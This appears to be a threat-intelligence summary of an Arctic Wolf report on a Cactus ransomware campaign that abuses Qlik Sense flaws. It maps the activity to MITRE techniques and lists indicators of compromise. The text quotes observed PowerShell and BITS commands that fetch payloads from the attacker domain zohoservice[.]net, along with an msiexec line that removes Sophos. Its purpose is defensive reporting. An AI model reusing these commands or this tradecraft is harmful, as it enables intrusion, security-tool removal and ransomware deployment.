Qlik Sense Exploited in Cactus Ransomware Campaign – Arctic Wolf

Arctic Wolf Labs reports a new Cactus ransomware campaign that exploits public Qlik Sense installations to gain initial access, followed by deployment of the ransomware. The operation leverages Qlik Sense Scheduler to drop remote-access tools (ManageEngine UEMS, AnyDesk, Plink), uses PowerShell and BITS for payload delivery, and includes RDP, WizTree, and rclone for lateral movement, discovery, and exfiltration. Hashtags: #QlikSense #CactusRansomware #ArcticWolf #QlikSenseScheduler #ManageEngineUEMS #AnyDesk #PuTTY #Plink #zohoservice.net

Keypoints

  • Exploitation of Qlik Sense installations to gain initial access and deploy Cactus ransomware.
  • Exploited CVEs CVE-2023-41266, CVE-2023-41265, or potentially CVE-2023-48365 to achieve code execution.
  • The Scheduler service (Scheduler.exe) is central to the intrusion, spawning uncommon processes and enabling further actions.
  • PowerShell and the Background Intelligent Transfer Service (BITS) are used to download tools and establish persistence/remote control.
  • Tools downloaded/used include ManageEngine UEMS (renamed), AnyDesk, and PuTTY Link (Plink).
  • Remote access and lateral movement involve RDP, SSH tunnels via Plink, and related credential/configuration steps.
  • Discovery and exfiltration steps involve WizTree for disk insight and rclone for data exfiltration.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The threat actors exploited Qlik Sense installations to achieve code execution. “Based on patch level Qlik Sense is likely being exploited either via the combination or direct abuse of CVE-2023-41266, CVE-2023-41265 or potentially CVE-2023-48365 to achieve code execution.”
  • [T1059.001] PowerShell – The intrusion uses PowerShell to download and execute payloads, e.g., “powershell iwr -uri http://zohoservice[.]net/putty.zip -OutFile c:windowstempputty.exe” and related commands.
  • [T1197] BITS Jobs – The attackers leveraged Background Intelligent Transfer Service (BITS) to download additional tools, e.g., “powershell start-bitstransfer -source http://zohoservice.net/qlik-sens-nov.zip -outfile c:windowstempQliksens.exe”
  • [T1036] Masquerading – Renamed ManageEngine UEMS executables, with a ZIP extension masquerading as Qlik files.
  • [T1218.009] Signed Binary Proxy Execution – Msiexec – “MsiExec.exe /X{…} /qn” used to uninstall Sophos as part of the activity.
  • [T1021.001] Remote Services – RDP – Used for lateral movement within networks.
  • [T1021.004] Remote Services – SSH – Plink was used to establish an SSH tunnel for remote access.
  • [T1219] Remote Access Software – AnyDesk was downloaded and used for remote control.
  • [T1083] File and Directory Discovery – WizTree was downloaded to assess disk space and files for discovery.
  • [T1041] Exfiltration Over C2 Channel – rclone was used (renamed as svchost.exe) to exfiltrate data.

Indicators of Compromise

  • [IOC Type] IP Address – 45.61.147[.]176 (ManageEngine Server / IP for zohoservice[.]net); 216.107.136[.]46 (ManageEngine Server hosting payload over HTTP); 144.172.122[.]30 (ManageEngine Server hosting payload over HTTP)
  • [IOC Type] Domain Name – zohoservice[.]net (Hosting payload over HTTP)
  • [IOC Type] URL – http://zohoservice[.]net/putty.zip; http://216.107.136[.]46/Qliksens_update.zip; http://216.107.136[.]46/Qliksens_updated.zip; http://zohoservice[.]net/qlik-sens-Patch.zip; http://zohoservice[.]net/qlik-sens-nov.zip
  • [IOC Type] File path – C:UsersPublicsvchost.exe; c:windowstempQliksens.exe; c:windowstempany.exe; C:WindowsappcompatAcRes.exe
  • [IOC Type] Filename – Qliksens.exe; Qliksens_updated.zip; Qliksens_update.zip; Qlik_sense_enterprise.zip; anydesk.zip; putty.exe
  • [IOC Type] SHA256 – 828e81aa16b2851561fff6d3127663ea2d1d68571f06cbd732fdf5672086924d; 90b009b15eb1b5bc4a990ecdd86375fa25eaa67a8515ae6c6b3b58815d46fa82; 3ac8308a7378dfe047eacd393c861d32df34bb47535972eb0a35631ab964d14d; 6cb87cad36f56aefcefbe754605c00ac92e640857fd7ca5faab7b9542ef80c96
  • [IOC Type] URL – https://download.anydesk.com/AnyDesk.exe (Official AnyDesk Installer)

Read more: https://www.arcticwolf.com/resources/blog/qlik-sense-exploited-in-cactus-ransomware-campaign/